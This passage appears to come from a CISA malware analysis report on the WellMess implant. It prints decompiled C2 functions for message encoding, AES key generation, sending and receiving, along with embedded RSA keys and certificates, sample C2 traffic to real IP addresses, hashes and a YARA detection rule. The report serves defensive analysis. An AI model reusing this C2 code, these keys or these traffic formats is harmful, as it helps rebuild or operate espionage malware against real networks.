UpHCRc2 cbgnSm. UFu\r\nk:cIT cBH5 Fxk 2Jk. ErKKHod 0dgeQ5e 7MV 8PH0 tsUn. dMd,glf x3Q ZpNEDt FnvMxh IM:p:. lbabsz3EA    \r\n—End Sample Network Traffic—\r\nContained within the “Cookie:” section of the data is simple session information, including a hash that is unique to the target\r\nsystem. The unique hash generated from the target system is computed by calculating the SHA256 hash of various pieces of\r\ninformation about the victim system pieced together into a single string (Figure 2). These pieces of information include the\r\ncomputer name, session name, computer name, and user domain.\r\nThis data is RC6 encrypted with a hard-coded key and then Base64 encoded. This Base64 encoding is then encoded with the\r\nfollowing algorithm which generates slightly modified Base64 data that appears to contain spaces between different parts of\r\nthe original Base64 encoded data:\r\n—Begin FromBase64ToNormal Function—\r\npublic static string FromBase64ToNormal(string base64Str)\r\n   {\r\n    int num1 = 0;\r\n    int length1 = base64Str.Length;\r\n    string str1 = base64Str.Replace(\"=\", \" \");\r\n    base64Str = string.Empty;\r\n    string str2 = str1.Replace('+', ',');\r\n    string empty1 = string.Empty;\r\n    string str3 = str2.Replace('/', ':');\r\n    string empty2 = string.Empty;\r\n    StringBuilder stringBuilder = new StringBuilder();\r\n    int length2 = str3.TrimEnd().Length;\r\n    Random random = new Random();\r\n    int startIndex = 0;\r\n    while (startIndex \u003c length2 - 9)\r\n    {\r\n       int length3 = random.Next(3, 8);\r\n       int num2 = startIndex + length3;\r\n       if (num1 \u003e 5 \u0026\u0026 num1 % 5 == 0)\r\n        stringBuilder.Append(str3.Substring(startIndex, length3) + \". \");\r\n       else\r\n        stringBuilder.Append(str3.Substring(startIndex, length3) + \" \");\r\n       startIndex = num2;\r\n       ++num1;\r\n    }\r\n    stringBuilder.Append(str3.Substring(startIndex));\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 12 of 44\n\nstring empty3 = string.Empty;\r\n    return stringBuilder.ToString();\r\n   }\r\n—End FromBase64ToNormal Function—\r\nThe newly encoded string is then broken into two separate parts. The split in the string happens at a random offset (Figure\r\n3). The two new parts of the string are then prepended with random strings followed by an “=“ character. Both of the strings\r\nare then Uniform Resource Locator (URL) encoded.\r\nUpon execution, the malware generates an AES key which will be used during C2 sessions. This key is generated via the\r\nfollowing function:\r\n—Begin AES Key Generation Function—\r\npublic static Dictionary\u003cstring, byte[]\u003e GenerateSymmKey()\r\n   {\r\n    Dictionary\u003cstring, byte[]\u003e dictionary = new Dictionary\u003cstring, byte[]\u003e();\r\n    byte[] hash = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(Membership.GeneratePassword(16, 4)));\r\n    byte[] randomBytes = GenerateKeys.GetRandomBytes(8);\r\n    using (RijndaelManaged rijndaelManaged = new RijndaelManaged())\r\n    {\r\n       rijndaelManaged.KeySize = 256;\r\n       rijndaelManaged.BlockSize = 128;\r\n       Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(hash, randomBytes, 1000);\r\n       rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);\r\n       rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8);\r\n       dictionary.Add(\"Key\", rijndaelManaged.Key);\r\n       dictionary.Add(\"IV\", rijndaelManaged.IV);\r\n    }\r\n    return dictionary;\r\n   }\r\n—End AES Key Generation Function—\r\nThe malware also contains the following hard-coded public RSA key:\r\n—Begin Pub RSA Key—\r\n\u003cRSAKeyValue\u003e\r\n\u003cModulus\u003e4Dy24gTFNYA/jq6SYiAkdRvY1ieWqM9R8dwo0uL+4GzaRObZEoUaZSHhvfeD1v762+duL1LgAcuXJeRg4PB4cGdpZqjKtB2BKIDJv3h2\r\n\u003c/Modulus\u003e\u003cExponent\u003eAQAB\u003c/Exponent\u003e\u003c/RSAKeyValue\u003e\"\r\n—End Pub RSA Key—\r\nThe encrypted portion of the callout in the main body of the POST is the dynamically generated AES key encrypted with the\r\nhard-coded RSA public key. The following function is utilized to conduct the initial C2 connection to the C2 server. The\r\n“Message” variable argument will contain the dynamically generated AES key encrypted utilizing the embedded RSA public\r\nkey.\r\n—Begin SendMessage Function—\r\npublic void SendMessage(string Message, string idMess, string askOrReply, string service)\r\n   {\r\n    TransportProtocol transportProtocol = new TransportProtocol();\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 13 of 44\n\nstring message = transportProtocol.FullMessage(idMess, askOrReply, service);\r\n    string service1 = new RC6(Convert.FromBase64String(Variable.keyRC6), Variable._serverType).Encrypt(message);\r\n    Dictionary\u003cHttpStatusCode, List\u003cstring\u003e\u003e dictionary = transportProtocol.Post(Message, service1, true);\r\n    for (int index = 0; !dictionary.ContainsKey(HttpStatusCode.OK) \u0026\u0026 index \u003c 3; ++index)\r\n    {\r\n       Thread.Sleep(new Random().Next(5, 20) * 1000);\r\n       dictionary = transportProtocol.Post(Message, service1, true);\r\n    }\r\n   }\r\n—End SendMessage Function—\r\nThe malware contains a function named “DownloadVar” which allows the malware to receive and parse messages from the\r\nremote operator. As illustrated, the malware will decrypt the body of these messages using the dynamically generated AES\r\nkey mentioned above.\r\n—Begin DownloadVar Function—\r\nprivate static Dictionary\u003cstring, string\u003e DownloadVar(\r\n    string idMess,\r\n    string askOrReply,\r\n    string service,\r\n    bool client)\r\n   {\r\n    List\u003cstring\u003e message = new Transport().ReceiveMessage(idMess, askOrReply, service, client);\r\n    try\r\n    {\r\n       Dictionary\u003cstring, string\u003e dictionary = new ParseMessage(message[0]).Parse();\r\n       if (!dictionary.ContainsKey(\"body\"))\r\n        dictionary.Add(\"body\", message[1]);\r\n       if (dictionary[nameof (service)] == \"p\" || dictionary[\"head\"] == \"C\" || dictionary[\"head\"] == \"G\" || !client)\r\n        return dictionary;\r\n       if (string.IsNullOrEmpty(dictionary[\"body\"]))\r\n        return dictionary;\r\n       try\r\n       {\r\n        byte[] numArray = SymmCrypto.AES_Decrypt(Convert.FromBase64String(dictionary[\"body\"]), Variable.keySymm);\r\n        dictionary[\"body\"] = !dictionary[nameof (service)].StartsWith(\"f\") ? Message.UnPack(numArray) :\r\nMessage.UnPackB(numArray);\r\n        return dictionary;\r\n       }\r\n       catch (FormatException ex)\r\n       {\r\n        return (Dictionary\u003cstring, string\u003e) null;\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 14 of 44\n\n}\r\n    }\r\n    catch (Exception ex)\r\n    {\r\n       return (Dictionary\u003cstring, string\u003e) null;\r\n    }\r\n   }\r\n—End DownloadVar Function—\r\nScreenshots\r\nFigure 2 - Data contained within the \"cookie:\" header of the initial traffic to the remote C2, being encrypted with RC6.\r\nFigure 3 - Malware generating hash unique for the victim system. This hash value in an encrypted and encoded format will\r\nbe included in the \"cookie:\" header of the transmissions to the C2 server.\r\nFigure 4 - Encrypted \"cookie:\" header being formatted for transmission of the remote C2 server.\r\n85.93.2.116\r\nTags\r\ncommand-and-control\r\nWhois\r\nQueried whois.ripe.net with \"-B 85.93.2.116\"...\r\n% Information related to '85.93.2.0 - 85.93.2.255'\r\n% Abuse contact for '85.93.2.0 - 85.93.2.255' is 'noc@lubnanet.com'\r\ninetnum:        85.93.2.0 - 85.93.2.255\r\nnetname:        Arcompus-Medianet\r\ndescr:         Arcompus-Medianet\r\ncountry:        LB\r\norg:            ORG-AMIS1-RIPE\r\nadmin-c:        AMN61-RIPE\r\ntech-c:         AMN61-RIPE\r\nstatus:         ASSIGNED PA\r\nmnt-by:         arcompusmedia-mnt\r\ncreated:        2015-10-05T12:27:29Z\r\nlast-modified: 2015-10-05T12:27:59Z\r\nsource:         RIPE\r\norganisation: ORG-AMIS1-RIPE\r\norg-name:     Arcompus Medianet Int. SARL\r\norg-type:     OTHER\r\naddress:        Baabda\r\naddress:        Lebanon\r\ne-mail:         noc@lubnanet.com\r\nabuse-c:        AC32241-RIPE\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 15 of 44\n\nmnt-ref:        arcompusmedia-mnt\r\nmnt-by:         arcompusmedia-mnt\r\ncreated:        2015-10-02T07:33:53Z\r\nlast-modified: 2020-01-03T08:52:39Z\r\nsource:         RIPE\r\nrole:         Network Operations Centre\r\naddress:        15 Saed Fraiha,\r\naddress:        Baabda, 1003,\r\naddress:        Lebanon\r\ne-mail:         noc@lubnanet.com\r\nabuse-mailbox: noc@lubnanet.com\r\nnic-hdl:        AMN61-RIPE\r\nmnt-by:         arcompusmedia-mnt\r\ncreated:        2015-10-02T07:36:29Z\r\nlast-modified: 2020-01-03T08:31:27Z\r\nsource:         RIPE\r\n% Information related to '85.93.2.0/24AS203913'\r\nroute:         85.93.2.0/24\r\ndescr:         ArcompusMedia\r\norigin:         AS203913\r\nmnt-by:         arcompusmedia-mnt\r\ncreated:        2015-12-15T16:27:03Z\r\nlast-modified: 2018-02-06T10:01:56Z\r\nsource:         RIPE\r\n% This query was served by the RIPE Database Query Service version 1.97.2 (ANGUS)\r\nRelationships\r\n85.93.2.116 Connected_From 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\r\nDescription\r\n47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854 attempts to connect to the IP address.\r\n5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\nTags\r\ntrojan\r\nDetails\r\nName 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\nSize 6900178 bytes\r\nType ELF 64-bit LSB executable, x86-64, version 1 (SYSV)\r\nMD5 3a9cdd8a5cbc3ab10ad64c4bb641b41f\r\nSHA1 e45f89c923d0361ce8f9c64a63031860a76b2d10\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 16 of 44\n\nSHA256 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\nSHA512 2d1d26081637c925fb6ae5f92b278f87a8253fd65a75c44fdc2c513a24dc9e0658c552ebc9c9c76c70ad948c60901e682184a833aae51a8c4d62\r\nssdeep 49152:hPyt5H89G+YrbjVWMiUMNqb054dzNIdEp+rt1D5TvLlcpigaB5IDPmoFjPnMBbs0:hqHaQKNzVLlhLopfMlsnh8K54\r\nEntropy 6.016965\r\nAntivirus\r\nAntiy Trojan/Linux.WellMess\r\nBitDefender Trojan.Linux.Generic.173705\r\nESET a variant of Linux/WellMess.B trojan\r\nEmsisoft Trojan.Linux.Generic.173705 (B)\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 17 of 44\n\nMD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 18 of 44\n\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n5ca4a9f655... Connected_To 209.58.186.196\r\n5ca4a9f655... Connected_To 141.98.212.55\r\nDescription\r\nThis artifact is an ELF 64-bit file. It has been identified as a variant of the WellMess malware family. When the file is\r\nexecuted, it attempts to create a C2 connection to one of the following IP addresses:\r\n141.98.212.55 over Transmission Control Protocol(TCP) Port 53\r\n209.58.186.196 over TCP Port 443\r\nThe initial C2 connection over port 53 will be a normal WellMess C2 session wherein parts of the message are encrypted\r\nwith RSA and RC6. Whereas, the C2 session via port 443 will be fully secured via a Secure Sockets Layer (SSL) session.\r\nThe following keys and certificates are used to create the secure connection:\r\n—Begin Keys and Certificates—\r\n—Begin Certificate—\r\nMIIDAzCCAeugAwIBAgICBnowDQYJKoZIhvcNAQELBQAwKTEOMAwGA1UEBhMFVHVu\r\naXMxCzAJBgNVBAoTAklUMQowCAYDVQQDEwEqMB4XDTE4MTIxNjA4NTEzNloXDTI5\r\nMDcxNjA3NTEzNlowHTEOMAwGA1UEBhMFVHVuaXMxCzAJBgNVBAoTAklUMIIBIjAN\r\nBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsLZde+H/Bu3mA8xRa2c9DCmdYqnc\r\nvGC1Re9BO3c+kCcUbVqyR2t3mPrDpW4L94MDDHEF7LZ5VcXvNCTrfwRKI+ncoGQr\r\ns6yR0xM7Ru1ObV/E6GdUGvlJMy2WKE3UsiHx2BJ2MnHvKa1yJSt5wjkMKEwqbUHQ\r\nIbLqmwrZ/Ud1AW+tZEs6kfEEuobNfIqLpZDLGT17FGnshqUa+iMnQ9b9Nax42kgm\r\n/2AsD0N0rW8+DOoP7RiCPqsbcUanquxpLqpO9Zyw517wHLpImUn56B+dwnHVWb8o\r\nO5qqikB2X+cq3rnSAaaBAD4JDVdQqS9poEXDnbBdGJczXSPFdx0UrOC5kQIDAQAB\r\no0EwPzAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUF\r\nBwMBMA4GA1UdDgQHBAUBAgMEBjANBgkqhkiG9w0BAQsFAAOCAQEAK/n6JljR5epC\r\nsUDpTz2GMGwnMHu0zOklOhv61AyfeTMC800G8/JbAe7ImueHSSWeV2Gg/tv10wrv\r\nHKMNAkiPxaAK3wSl2391e3+e1SD/fmJNqBJVm2/OegzdezRyujTzwvsVuGIGJknH\r\nehutZmaL6GMYy9BtWs4n8tLgIn+vi7WofawNhPyIYqkvZvitqUhJ5IcIFDkeoiYb\r\n9ThGlPI91X0c+6nxMJSLHdD6D8mVQKDP9CH9Kr7weXeFBE8AbVMi3/Jm6V791/jr\r\nR5Z/j1JiU2o69Cj+31CfqXuIxd712MHSPoqhcXZov8w55MXgvX9NxY31G76X5R3h\r\n71A5grjoww==\r\n—End Certificate—\r\n—Begin Certificate—\r\nMIIDEDCCAfigAwIBAgICBnUwDQYJKoZIhvcNAQELBQAwKTEOMAwGA1UEBhMFVHVu\r\naXMxCzAJBgNVBAoTAklUMQowCAYDVQQDEwEqMB4XDTE5MDIwNTExMjgyOVoXDTI5\r\nMDIxNTExMjgyOVowKTEOMAwGA1UEBhMFVHVuaXMxCzAJBgNVBAoTAklUMQowCAYD\r\nVQQDEwEqMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwgjuu797/ixV\r\n8DOeOVSbxihX4RO9TI0CKnveqjzbb7a64fjJxIy/WxcpruLaeC1xhaWfxPeoMVJe\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 19 of 44\n\nFZxdiE59uDLdhRJzItEmoRrxGqcZQ94K6G1YoNFBP7dGzn8J+GSP0JdWrHUGkpaq\r\nW1xFl0zk33AuFwOCJmgQN6TD1lXgwQx90IZFsmBkeZYUQRaNEV6gwSzFQZauZ161\r\nEUsW7WeOJ71uTOqC71NEtXypYFhqpUhmHAABPetoBO1MyBxseaQiji+m5XjWGMfu\r\n0ZuXRpJ4qAGhwrVVbR4MoLWa8VYytGCcMPZoWedmvAOX5wl9Ol9JAL+g2hOY79rS\r\nmoF+Dc/S+QIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAoQwHQYDVR0lBBYwFAYIKwYB\r\nBQUHAwIGCCsGAQUFBwMBMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQAD\r\nggEBAJgenxhajyC5gNQR1e7umh6WWSS8P3ywqKMf1AEHjvrzKoJiUCRQ+BHAf4B0\r\nTNQ4GpMIwDZBAMTmq80lEVZAy3M21Q4+iPzDBDaCV88bqD4AgIwnpxPoaAVUJoXJ\r\n+tBQ7OSz6s8QYJWnMhSqcytj3pLrfUhgkjtBzScx18zL+l21V/v08y+geE3iw/Fh\r\nblGDPjcLPYCuPSFpmy+X+/h0VSvQdV7KvS9B7g7KzA0eR7Y516xKBXmGV80PRJj2\r\nlbi5v2CxdJHggTWt4q4/GB4PAHMFr/dz4qOsSKeryZJcSK2HODtl1Mr5zXdn3DB4\r\nGjt5XCFfp0SzMWhtOIes8N97+lQ=\r\n—End Certificate—\r\n—Begin RSA Private Key—\r\nMIIEowIBAAKCAQEAsLZde+H/Bu3mA8xRa2c9DCmdYqncvGC1Re9BO3c+kCcUbVqy\r\nR2t3mPrDpW4L94MDDHEF7LZ5VcXvNCTrfwRKI+ncoGQrs6yR0xM7Ru1ObV/E6GdU\r\nGvlJMy2WKE3UsiHx2BJ2MnHvKa1yJSt5wjkMKEwqbUHQIbLqmwrZ/Ud1AW+tZEs6\r\nkfEEuobNfIqLpZDLGT17FGnshqUa+iMnQ9b9Nax42kgm/2AsD0N0rW8+DOoP7RiC\r\nPqsbcUanquxpLqpO9Zyw517wHLpImUn56B+dwnHVWb8oO5qqikB2X+cq3rnSAaaB\r\nAD4JDVdQqS9poEXDnbBdGJczXSPFdx0UrOC5kQIDAQABAoIBAQCAXRhvQu00JV+u\r\nZp7GPAoWaaxP3T/g/wbutCtYfPhPUnP+M6HJS4Fm+NFhvBypQNvYD8nT94EQE2X9\r\nJMyESaNpjxma0OkF7VdIUnH+xabwwF6Sy2xG48qOiJDI2jCk7Q92e4KshiLKzZla\r\n8sfRlAsGwr0W/HWp5QOSeEF9QIj37udx8zoo68ROFLe3RIbc4VsjN4/rC46K1YHb\r\nOi9J+M2ScFWTjHYAu4Pvrjd8WqvPudF5FG+g4pF9qGhGhM27q37skNHr1REby/UU\r\nQC7zzAUJB9c+Wr+iREDI3psItVzCL7ZXqHpG2qM3VdqMz+m+EN1vnfZWNX4EuaUa\r\nHp/YhOCZAoGBAOiS0Cs6RWtXEnNdSD3ap0M9yqwtrdV7iNcy4PGtIOTICN/3paVF\r\nEatcOowqwpXiihZIEWDAe2QuvlocL4rIDHof42kInr7nM9pMHZia50qtSmGATwTN\r\n3BbqTkK7O2wSbsZoZzRpTMB6kYonsw1xg02jTh+aXTMstpL/2I96v7AvAoGBAMKD\r\nGxUKspKSF9xPkaR1jI3YOp5GYZxhkbR/O4cZgHEClbZlwkd+er63ecvxNoNOYmu9\r\nMdh98t+Dsnv1zrA3cFAxmsmwiAvc/tPpv3KQPVe2XbWza1o9vueHYpSoE/wwjxmK\r\nWOV0Cazihoa0MV+lVyPRhKgCV1xLGcLc8kcD7AI/AoGAQ9WGaAVP+BXmaMWda4UZ\r\n4g/kzEFqgWjNqc7KM1NG09PQWtrVcpXpqGx3Gyjhpmvz0Lnmb6zUkIzdslSkPTtK\r\nAFjKsHj2LEItKo+m1jrgGTTgC/4rjgApIHnop6gKlePucWpEJ9JKs51MU9pubA5e\r\nuMdX4vnYEzQIcGm1FWw8+rsCgYBuLVkvyAlyYHJHhoKWx0bAKdS6Rl+P9uxTcyZC\r\n1j0cxjwLPwSW/puEX+ULkiwwoDu7j0UmveDOnoiBErDqu9xQcGifCfFl1t45JtQc\r\njntQranS/Dg4u3ThLJy4W6RGWzMTYnwMLHg2h3Fv56134e3ECi+8Aud9DcUfzYsm\r\nkqAifQKBgHtMn87pL0wQ8eLpk/5+4fSVR5cCBS9/oBciO/g2g88Grb69g8PTyn99\r\nbhiRlKDfAPnA/+gYtjCMNbyKkCy2Kf4UaWh3cMJnGafFTOci2Uve4zj/SSePAp3O\r\nviyz2EuMK0ZZc4nNBK6leRFq4GEgwZSr7RakpKU1t3vlhMrRDuSI\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 20 of 44\n\n—End RSA Private Key—\r\n—Begin Public Key—\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArRiKDue9YA6DUzYu6WQv\r\noWOxp8wel/Ws/5jK1Xsv2f8lJwUDxM+zT4dGL3ZyJLMkbBQk8HyvAm+6331M47vF\r\nsbva2BCzQxdEWO9ey3LnhCtpQOgjypf1QcPy4Kx6jj2BiVEtPP9YBa75QkUNR0oO\r\n0n6PKFP8SX6Mv0UyHqS3tsa8D21nm2hf3rO7sqBXevs9xdvKbxiKLJxY6WEvKAGH\r\n7Q09rndwr4b7gJ56GZGBwVeqkoVmRFM/nNq9aymTOe4PNRdOcpYK7AoT/QjA0IvO\r\nQ5XOapb3iJWHLlxCGfBRT+ISVfg4PVdXev2wsXFe6h3McXHoN7FZgyo10XiP2QZU\r\nRQIDAQAB\r\n—End Public Key—\r\n—End Keys and Certificates—\r\nThe program uses TCP ports 53 and 443 because of the likelihood that these ports would be open on the router. However,\r\noutbound TCP connections initiated on TCP port 53 would be unusual, because typically, this port is reserved for the\r\nDomain Naming System (DNS) and outbound queries are done using the User Datagram Protocol (UDP) protocol or TCP,\r\nwhile inbound answer records may use both. This activity could be flagged as suspicious.\r\nThe malware contains functions that are similar in design to the .NET version of WellMess\r\n(47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854). Figures 5-7 detail that both implants\r\ncontained similar functions named “Work” and “SendMessage”.\r\nIn addition, this sample contains a function named “botlib_Exec”, which is very similar in design and purpose to the\r\nfunction named “Command” within the file 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854.\r\nBoth implants utilize the same REGEX value to parse executable scripts from data received from a remote operator via a C2\r\nsession. (Figure 8).\r\nA primary difference between the implants is that this version initially attempts a C2 session to IP address 141.98.212.55\r\nover port 53. If this C2 server is not available, it will attempt an SSL secured (port 443) C2 session with the C2 IP address\r\n209.58.186.196. The presence of an RSA private key within this implant is likely to facilitate this secure SSL session.\r\n—Begin WellMess C2 session—\r\nPOST / HTTP/1.1\r\nHost: 141.98.212.55:53\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0\r\nContent-Length: 422\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nCookie: kODDoMox=1BL6+BSiiy+oacN+71k8zt0+QD9kU+68ED+dmsgi+yPol5+b%2C;\r\nOVbjPRp4=0w1X.+2IB+nuI+58oEfe4+q9P+nrw+pmQk3X+fN%2CB9u+aP%2C3EB.+%3Aa%3A+0UOlTc+Ew%2Cy5O+Y%2CXTx%2C+Of7mNHE\r\nAccept-Encoding: gzip\r\nDZ0 rUtgNTf e,j:gB DFd dLSYB mq53txH 8JYY75r EQXyIUk 2FqYSrc. xscOr3E rzbl Q494 Gvkb1q sifD6 pog q0Ybz4D\r\nasij. 26sQ PkMZPh1 IyV 8VW 0C3038b QpTy8Cf z6mJw oeg. 6MG8,lQ ymdPXR q1tRd Fxg brhM 7cp Zf9JPKV\r\nCcKyKPK. OFdOqE 6XO oL8kKA qnq 9c2Yc9 ,xm6Gdy ra9 ORzvq. 3BX8q 6rE 2:H 1ALG8G N7yX 8hn3aNR kHykST9\r\nKucSC2. b0l LJBc6i 9hK2 ZtJ1 jLi9cUA 7VRh G6PGAU qM9n5FD. bTy YMzPKF KKnk0i TyYK SMAV sbE 2Jflrk\r\nyPmCpN. 2X35q5 JhXg    \r\n—End WellMess C2 Session—\r\nScreenshots\r\nFigure 5 - This function is similar to the \"Work\" function found within the WellMess sample\r\n47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854.\r\nFigure 6 - \"botlib_Work\" function within this WellMess implant, parsing for the same bytes as the \"Work\" function within\r\nWellMess sample 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 21 of 44\n\nFigure 7 - \"botlib.SendMessage\" function found within this WellMess implant and is similar to the \"SendMessage\" function\r\ncontained within 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854.\r\nFigure 8 - Part of REGEX value this malware utilizes to parse command information, including executable scripts, from data\r\nreceive from remote operator. This is the same REGEX value the WellMess sample\r\n47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854 uses to parse command data.\r\n141.98.212.55\r\nTags\r\ncommand-and-control\r\nPorts\r\n53 